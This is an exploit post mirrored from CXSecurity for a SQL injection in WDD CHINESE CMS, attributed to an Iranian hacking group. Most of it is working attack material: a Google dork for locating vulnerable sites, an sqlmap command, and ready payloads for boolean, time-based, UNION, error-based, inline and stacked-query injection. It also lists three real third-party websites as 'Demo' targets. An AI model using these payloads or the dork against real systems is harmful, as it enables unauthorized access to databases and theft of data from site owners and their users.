WDD CHINESE CMS SQL injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1652469 漏洞类型
发布时间 2019-07-03 更新时间 2019-07-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070018
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: WDD CHINESE CMS SQL injection
# Date: 2019-07-3
# Google Dork : intext:"DESIGNED BY WDD" inurl:ID=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.wddgroup.com
# Version: All Version
# Tested on: win,linux
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
                                             [SQL injection]     

[+] Method ( Sql injection ) Storm Security Team of IRAN
[+]  parameter  : ID == php?ID=
=================================================================================

[+] Sqlmap: 
 
[-] sqlmap -u "http://victim.com/product.php?KindID=1&ID=" -p ID --dbs
 



[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - error-based
[+] - UNION query
[+] - inline query
[+] - stacked queries

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|||||||||||||||||||||||
Parameter: ID (GET)  ||
|||||||||||||||||||||||
	Type: boolean-based blind
	Title: AND boolean-based blind - WHERE or HAVING clause
	Payload: KindID=1&ID=6 AND 9460=9460
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: AND/OR time-based blind
	Title: MySQL >= 5.0.12 AND time-based blind
	Payload: KindID=1&ID=6 AND SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

     
	Type: UNION query
	Title: Generic UNION query (NULL) - 17 columns
	Payload: KindID=1&ID=-9428 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(12
0)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(120)+CHAR(107)+CHAR(119)+CHAR(73)+CHAR(76)+CHAR(72)+CHAR(72)+CHAR(101)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(72)+CHAR(77)+CHAR(118)+CHAR(112)+CHAR(83)+CHAR(111)+CHAR(81)+CHAR(84)+CHAR(67)+CHAR(110)+CHAR(72)+CHAR(82)+CHAR(75)+CHAR(102)+CHAR(78)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(78)+CHAR(75)+CHAR(109)+CHAR(99)+CHAR(112)+CHAR(82)+CHAR(80)+CHAR(90)+CHAR(87)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aXFY
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: error-based
	Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
	Payload: KindID=1&ID=6 AND (SELECT 2082 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(2082=2082,1))),0x716a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: inline query
	Title: Microsoft SQL Server/Sybase inline queries
	Payload: KindID=1&ID=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113))
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: stacked queries
	Title: Microsoft SQL Server/Sybase stacked queries (comment)
	Payload: KindID=1&ID=138;WAITFOR DELAY '0:0:5'--
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] https://www.crmto.com/news.php?KindID=1&ID=6[SQL]
[+] http://www.catchertw.com.tw/company_news_more.aspx?KindID=1&ID=138[SQL]
[+] http://www.navjack.com/product.php?KindID=36&ID=127[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#